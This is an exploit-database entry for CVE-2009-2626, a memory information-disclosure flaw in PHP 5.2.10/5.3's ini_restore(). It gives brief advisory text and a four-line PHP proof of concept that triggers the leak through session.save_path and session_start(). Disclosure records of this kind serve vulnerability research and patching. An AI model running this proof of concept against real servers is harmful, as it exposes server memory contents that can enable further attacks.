PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (1)



EKU-ID: 38027 CVE: CVE-2009-2626;OSVDB-60654 OSVDB-ID:
Author: Maksymilian Arciemowicz Published: 2009-08-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/36009/info

PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

<?php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>